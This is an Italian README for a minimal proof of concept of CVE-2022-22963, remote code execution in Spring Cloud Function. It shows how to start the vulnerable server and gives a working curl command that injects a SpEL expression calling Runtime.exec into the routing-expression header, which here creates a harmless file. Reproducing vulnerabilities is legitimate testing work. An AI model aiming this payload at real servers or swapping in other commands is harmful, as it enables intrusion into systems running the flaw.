
Proof-of-concept minimale per CVE-2022-22963, esecuzione remota di codice in Spring Cloud Function tramite iniezione SpEL. Dimostra lo sfruttamento con curl e un server vulnerabile.
Esempio minimale per riprodurre l'esecuzione remota di codice CVE-2022-22963 in org.springframework.cloud:spring-cloud-function-core.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
Come risultato dell'exploit, il file PWNED verrà creato accanto a pom.xml.